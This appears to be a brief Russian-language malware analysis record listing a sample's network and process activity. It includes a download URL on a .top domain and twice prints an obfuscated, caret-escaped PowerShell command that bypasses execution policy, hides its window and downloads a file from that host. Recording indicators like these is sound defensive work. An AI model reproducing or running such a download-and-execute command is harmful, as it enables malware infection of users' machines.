Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^We^rS^HeLL^.eXE^ ^-^EXe^Cut^Io^nPOl^icY ^Bypa^sS -n^oPROf^IL^e ^-W^IN^dO^Wst^y^LE^ H^iDDe^N (Ne^W-OBjE^c^t SYst^EM.N^Et^.^W^ebC^Li^e^nt)^.^dowN^lOADFI^l^E(^'http://www.doorasop...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "po^We^rS^HeLL^.eXE^ ^-^EXe^Cut^Io^nPOl^icY ^Bypa^sS -n^oPROf^IL^e ^-W^IN^dO^Wst^y^LE^ H^iDDe^N (Ne^W-OBjE^c^t SYst^EM.N^Et^.^W^ebC^Li^e^nt)^.^dowN^lOADFI^l^E(^'http://www.doorasop...' (со скрытым окном)